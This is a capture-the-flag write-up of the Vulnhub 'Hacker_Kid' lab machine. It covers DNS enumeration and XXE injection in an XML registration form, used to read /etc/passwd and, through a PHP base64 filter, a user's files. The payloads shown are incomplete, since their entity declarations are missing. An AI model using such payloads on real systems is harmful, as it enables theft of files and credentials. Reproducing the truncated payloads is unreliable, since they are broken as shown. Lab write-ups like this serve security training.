Capture the Flag: Hacker_Kid Machine Exploitation Guide

Platform: VirtualBox

Attacker System: Kali Linux (IP: 10.0.2.15)

Target System: Hacker_Kid (IP: 10.0.2.42)

Objective: Obtain root privileges and capture the flag.

Reconnaissance and Scanning

Initial host discovery was performed using Nmap to identify the target IP address. Subsequently, a port scan revealed three open services:

  • Port 53 (DNS)
  • Port 80 (HTTP)
  • Port 9999 (HTTP)

Investigating port 80 yielded no immediate actionable vulnerabilities. Shifting focus to port 9999, a login portal was discovered. Inspection of the page source code revealed a developer comment suggesting the use of a specific GET parameter for navigation.

<!-- Debug: use 'page_index' parameter to view other pages -->

Attempting to access ?page_index=1 displayed a page with a vague message encouraging "digging deeper." Using Burp Suite to fuzz the parameter value, a hidden page was discovered at page_index=21.

This hidden page contained a message hinting at subdomain usage:

Message: "I created several subdomains to maintain access. For example: hackers.blackhat.local"

Since port 53 (DNS) is open, a DNS zone transfer attack was attempted using dig to enumerate further subdomains.

dig @10.0.2.42 hackers.blackhat.local

The query revealed a new subdomain: hackerkid.blackhat.local. This entry was added to the local DNS resolution file (/etc/hosts) on the attacker machine:

10.0.2.42    hackerkid.blackhat.local
10.0.2.42    blackhat.local

Navigating to the new subdomain exposed a user registration form.

Vulnerability Analysis and Exploitation

Capturing the registration request with Burp Suite revealed that the data is transmitted in XML format. This presents a potential vector for XML External Entity (XXE) injection.

Since the application echoes back the email value in the response, an out-of-band or error-based XXE payload can be constructed to read local files. The following payload was crafted to read the /etc/passwd file:

<?xml version="1.0" encoding="UTF-8"?>

]>
<user>
    <name>admin</name>
    <email>&xxe;</email>
    <password>password123</password>
</user>

The injection was successful, returning the contents of /etc/passwd. The output identified two users with shell access:

root:x:0:0:root:/root:/bin/bash
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash

Efforts then shifted to reading sensitive files belonging to the user 'saket'. Direct file reading of files like .bash_history failed due to XML parsing errors caused by special characters. To bypass this, the PHP filter wrapper was utilized to base64 encode the file content before transmission.

<?xml version="1.0" encoding="UTF-8"?>

]>
<user>
    <name>admin</name>
    <email>&xxe;</email>
    <password>password123</password>
</user>

This allowed for the successful extraction and decoding of sensitive user configuration files for further analysis.

Tags: xxe Vulnhub penetration-testing dns-enumeration CTF

Posted on Fri, 15 May 2026 03:23:57 +0000 by beanwebb

Hot Tags

©2026 Freaks City